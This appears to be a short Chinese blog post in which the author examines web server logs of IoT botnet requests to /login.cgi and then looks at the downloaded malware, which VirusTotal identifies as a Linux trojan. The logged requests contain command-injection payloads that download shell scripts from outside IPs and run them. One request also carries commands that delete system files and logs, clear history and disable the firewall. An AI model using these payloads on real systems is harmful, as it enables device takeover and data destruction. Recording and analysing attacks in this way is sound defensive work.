1.55.6.214 - - [29/Jun/2019:12:44:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://103.83.157.41/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
151.72.192.183 - - [29/Jun/2019:13:04:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "ELEMENT/2.0"
37.6.220.254 - - [29/Jun/2019:17:38:04 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://157.230.173.232/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "DEMONS/2.0"
79.45.31.73 - - [29/Jun/2019:19:01:27 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "ELEMENT/2.0"
151.66.2.254 - - [29/Jun/2019:19:16:41 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://68.183.88.126/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "Tron/2.0"
除了第一個下載東西後會再關閉防火牆, 其他都是下載東西後改執行權限
隨便點一個下載連結, 結果是一個 shell 檔, 會去下載一個 element.mips 檔案, 而且是針對 dlink 設備??
下載回來的 element.mips 檔案, 打開看看一堆亂碼, 不過裡面有幾段有趣的東西, 原來這是一個壓縮檔, 可以解壓縮
將 element.mips 解壓縮, 結果是一堆不知用途的檔案
將 element.mips 上傳到 virustotal 分析, 嗯, 原來是針對 Linux 系統的木馬病毒
沒有留言:
張貼留言